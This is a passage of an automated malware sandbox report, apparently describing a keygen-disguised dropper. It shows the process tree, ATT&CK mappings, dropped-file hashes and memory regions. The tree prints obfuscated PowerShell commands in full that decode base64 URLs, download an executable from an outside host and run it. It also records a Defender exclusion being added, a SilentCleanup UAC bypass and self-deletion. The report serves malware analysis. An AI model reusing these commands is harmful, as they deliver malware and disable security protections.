            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:572
        • C:\Windows\SysWOW64\timeout.exe
          timeout 2
          3⤵
          • Delays execution with timeout.exe
          PID:2044
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\31DA.tmp\ba.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:920
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1884
            • C:\Users\Public\div.exe
              "C:\Users\Public\div.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2692
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2900
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks processor information in registry
                  PID:3008
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c taskkill /pid 3008 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\281738791072621\\* & exit
                    8⤵
                      PID:2672
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /pid 3008
                        9⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:960
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2932
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:3044
                • C:\Users\Public\div.exe
                  "C:\Users\Public\div.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops desktop.ini file(s)
                  • Modifies system certificate store
                  PID:2992
                  • C:\Users\Admin\AppData\Local\Temp\ys5CJPbp73.exe
                    "C:\Users\Admin\AppData\Local\Temp\ys5CJPbp73.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2696
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                      "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\ys5CJPbp73.exe"'
                      8⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2092
                  • C:\Users\Admin\AppData\Local\Temp\sDaf07xVzl.exe
                    "C:\Users\Admin\AppData\Local\Temp\sDaf07xVzl.exe"
                    7⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    PID:1072
                    • C:\Windows\SysWOW64\Notepad.exe
                      "C:\Windows\System32\Notepad.exe"
                      8⤵
                        PID:2760
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c C:\Users\Public\Natso.bat
                          9⤵
                            PID:2396
                            • C:\Windows\SysWOW64\reg.exe
                              reg delete hkcu\Environment /v windir /f
                              10⤵
                              • Modifies registry key
                              PID:1720
                            • C:\Windows\SysWOW64\reg.exe
                              reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
                              10⤵
                              • Modifies registry key
                              PID:1184
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                              10⤵
                                PID:3044
                              • C:\Windows\SysWOW64\reg.exe
                                reg delete hkcu\Environment /v windir /f
                                10⤵
                                • Modifies registry key
                                PID:2112
                          • C:\Program Files (x86)\internet explorer\ieinstal.exe
                            "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                            8⤵
                              PID:2408
                          • C:\Users\Admin\AppData\Local\Temp\Q0HrswYR1C.exe
                            "C:\Users\Admin\AppData\Local\Temp\Q0HrswYR1C.exe"
                            7⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of SetWindowsHookEx
                            PID:112
                            • \??\c:\windows\SysWOW64\cmstp.exe
                              "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\4dsuugu5.inf
                              8⤵
                                PID:2056
                            • C:\Users\Admin\AppData\Local\Temp\ux9seVegtd.exe
                              "C:\Users\Admin\AppData\Local\Temp\ux9seVegtd.exe"
                              7⤵
                              • Executes dropped EXE
                              • Windows security modification
                              • Suspicious use of AdjustPrivilegeToken
                              PID:828
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "powershell" Get-MpPreference -verbose
                                8⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3000
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\div.exe"
                              7⤵
                                PID:2068
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /T 10 /NOBREAK
                                  8⤵
                                  • Delays execution with timeout.exe
                                  PID:2372
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\31DA.tmp\ba1.hta"
                        3⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of WriteProcessMemory
                        PID:1496
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1936

                  Network

                  MITRE ATT&CK Matrix ATT&CK v6

                  Persistence

                  Modify Existing Service

                  1
                  T1031

                  Registry Run Keys / Startup Folder

                  1
                  T1060

                  Defense Evasion

                  Modify Registry

                  6
                  T1112

                  Disabling Security Tools

                  2
                  T1089

                  Install Root Certificate

                  1
                  T1130

                  Credential Access

                  Credentials in Files

                  3
                  T1081

                  Discovery

                  Query Registry

                  2
                  T1012

                  System Information Discovery

                  2
                  T1082

                  Collection

                  Data from Local System

                  3
                  T1005

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\ProgramData\nss3.dll
                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • C:\ProgramData\sqlite3.dll
                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_84a918fd-f83a-4fb0-925c-7abea8a52a14
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_94e9f283-521f-415e-a7b8-558779dea150
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9a9065d3-c859-47e0-ae72-95fad695f608
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a8839806-41a6-4fd0-ba72-4043a72ae370
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de4eedb8-4762-4c56-b80c-203df3aa6fa8
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Temp\31DA.tmp\Keygen.exe
                  • C:\Users\Admin\AppData\Local\Temp\31DA.tmp\Keygen.exe
                  • C:\Users\Admin\AppData\Local\Temp\31DA.tmp\b.hta
                  • C:\Users\Admin\AppData\Local\Temp\31DA.tmp\b1.hta
                  • C:\Users\Admin\AppData\Local\Temp\31DA.tmp\ba.hta
                  • C:\Users\Admin\AppData\Local\Temp\31DA.tmp\ba1.hta
                  • C:\Users\Admin\AppData\Local\Temp\31DA.tmp\m.hta
                  • C:\Users\Admin\AppData\Local\Temp\31DA.tmp\m1.hta
                  • C:\Users\Admin\AppData\Local\Temp\31DA.tmp\start.bat
                  • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\Q0HrswYR1C.exe
                  • C:\Users\Admin\AppData\Local\Temp\Q0HrswYR1C.exe
                  • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • C:\Users\Admin\AppData\Local\Temp\sDaf07xVzl.exe
                    MD5

                    013db621a3351e3fb049efd2ccad79ff

                    SHA1

                    a23394ea54dbc5342a77938a2c285ee616185560

                    SHA256

                    df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                    SHA512

                    1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                  • C:\Users\Admin\AppData\Local\Temp\sDaf07xVzl.exe
                    MD5

                    013db621a3351e3fb049efd2ccad79ff

                    SHA1

                    a23394ea54dbc5342a77938a2c285ee616185560

                    SHA256

                    df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                    SHA512

                    1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                  • C:\Users\Admin\AppData\Local\Temp\ux9seVegtd.exe
                  • C:\Users\Admin\AppData\Local\Temp\ux9seVegtd.exe
                  • C:\Users\Admin\AppData\Local\Temp\ys5CJPbp73.exe
                  • C:\Users\Admin\AppData\Local\Temp\ys5CJPbp73.exe
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Public\Natso.bat
                  • C:\Users\Public\div.exe
                  • C:\Users\Public\div.exe
                  • C:\Users\Public\div.exe
                  • C:\Users\Public\hys.exe
                  • C:\Users\Public\hys.exe
                  • C:\Users\Public\hys.exe
                  • C:\Windows\temp\4dsuugu5.inf
                  • \??\PIPE\lsarpc
                  • \??\PIPE\srvsvc
                  • \??\PIPE\srvsvc
                  • \ProgramData\mozglue.dll
                  • \ProgramData\mozglue.dll
                  • \ProgramData\msvcp140.dll
                  • \ProgramData\msvcp140.dll
                  • \ProgramData\nss3.dll
                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • \ProgramData\nss3.dll
                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • \ProgramData\sqlite3.dll
                  • \ProgramData\sqlite3.dll
                  • \ProgramData\vcruntime140.dll
                  • \ProgramData\vcruntime140.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                    MD5

                    02cc7b8ee30056d5912de54f1bdfc219

                    SHA1

                    a6923da95705fb81e368ae48f93d28522ef552fb

                    SHA256

                    1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                    SHA512

                    0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
                  • \Users\Admin\AppData\LocalLow\sqlite3.dll
                  • \Users\Admin\AppData\Local\Temp\31DA.tmp\Keygen.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\Q0HrswYR1C.exe
                  • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • \Users\Admin\AppData\Local\Temp\sDaf07xVzl.exe
                    MD5

                    013db621a3351e3fb049efd2ccad79ff

                    SHA1

                    a23394ea54dbc5342a77938a2c285ee616185560

                    SHA256

                    df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                    SHA512

                    1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                  • \Users\Admin\AppData\Local\Temp\ux9seVegtd.exe
                  • \Users\Admin\AppData\Local\Temp\ys5CJPbp73.exe
                  • \Users\Public\div.exe
                  • \Users\Public\div.exe
                  • \Users\Public\hys.exe
                  • memory/112-294-0x0000000000A70000-0x0000000000A80000-memory.dmp
                    Filesize

                    64KB

                  • memory/112-293-0x0000000004A90000-0x0000000004A92000-memory.dmp
                    Filesize

                    8KB

                  • memory/112-274-0x0000000000000000-mapping.dmp
                  • memory/112-277-0x00000000709E0000-0x00000000710CE000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/112-286-0x0000000000580000-0x0000000000581000-memory.dmp
                    Filesize

                    4KB

                  • memory/112-278-0x0000000001010000-0x0000000001011000-memory.dmp
                    Filesize

                    4KB

                  • memory/112-291-0x0000000000A90000-0x0000000000AA2000-memory.dmp
                    Filesize

                    72KB

                  • memory/112-301-0x0000000004A90000-0x0000000004A92000-memory.dmp
                    Filesize

                    8KB

                  • memory/112-292-0x0000000000810000-0x0000000000815000-memory.dmp
                    Filesize

                    20KB

                  • memory/572-24-0x0000000000000000-mapping.dmp
                  • memory/572-37-0x00000000709E0000-0x00000000710CE000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/572-167-0x0000000006610000-0x0000000006611000-memory.dmp
                    Filesize

                    4KB

                  • memory/828-290-0x0000000000480000-0x0000000000481000-memory.dmp
                    Filesize

                    4KB

                  • memory/828-295-0x0000000000550000-0x0000000000561000-memory.dmp
                    Filesize

                    68KB

                  • memory/828-281-0x0000000000000000-mapping.dmp
                  • memory/828-303-0x00000000005F0000-0x00000000005F3000-memory.dmp
                    Filesize

                    12KB

                  • memory/828-288-0x0000000000DA0000-0x0000000000DA1000-memory.dmp
                    Filesize

                    4KB

                  • memory/828-285-0x00000000709E0000-0x00000000710CE000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/920-27-0x0000000000000000-mapping.dmp
                  • memory/960-221-0x0000000000000000-mapping.dmp
                  • memory/1044-36-0x00000000709E0000-0x00000000710CE000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1044-19-0x0000000000000000-mapping.dmp
                  • memory/1044-38-0x0000000002280000-0x0000000002281000-memory.dmp
                    Filesize

                    4KB

                  • memory/1044-50-0x00000000027F0000-0x00000000027F1000-memory.dmp
                    Filesize

                    4KB

                  • memory/1072-569-0x0000000050480000-0x000000005049A000-memory.dmp
                    Filesize

                    104KB

                  • memory/1072-271-0x0000000000000000-mapping.dmp
                  • memory/1072-585-0x0000000010530000-0x000000001054A000-memory.dmp
                    Filesize

                    104KB

                  • memory/1072-327-0x0000000002F80000-0x0000000002FCC000-memory.dmp
                    Filesize

                    304KB

                  • memory/1184-579-0x0000000000000000-mapping.dmp
                  • memory/1208-8-0x0000000000000000-mapping.dmp
                  • memory/1424-211-0x00000000009D0000-0x00000000009D1000-memory.dmp
                    Filesize

                    4KB

                  • memory/1424-213-0x0000000000330000-0x0000000000331000-memory.dmp
                    Filesize

                    4KB

                  • memory/1424-219-0x0000000004150000-0x00000000041A1000-memory.dmp
                    Filesize

                    324KB

                  • memory/1424-207-0x0000000000000000-mapping.dmp
                  • memory/1424-210-0x00000000709E0000-0x00000000710CE000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1496-29-0x0000000000000000-mapping.dmp
                  • memory/1720-578-0x0000000000000000-mapping.dmp
                  • memory/1800-11-0x0000000000000000-mapping.dmp
                  • memory/1804-10-0x0000000000000000-mapping.dmp
                  • memory/1840-0-0x0000000000000000-mapping.dmp
                  • memory/1868-4-0x0000000000000000-mapping.dmp
                  • memory/1868-6-0x0000000000000000-mapping.dmp
                  • memory/1884-30-0x0000000000000000-mapping.dmp
                  • memory/1884-35-0x00000000709E0000-0x00000000710CE000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1900-253-0x000000000041A684-mapping.dmp
                  • memory/1900-252-0x0000000000400000-0x0000000000420000-memory.dmp
                    Filesize

                    128KB

                  • memory/1900-255-0x0000000000400000-0x0000000000420000-memory.dmp
                    Filesize

                    128KB

                  • memory/1904-246-0x0000000000000000-mapping.dmp
                  • memory/1924-22-0x00000000709E0000-0x00000000710CE000-memory.dmp
                    Filesize

                    6.9MB

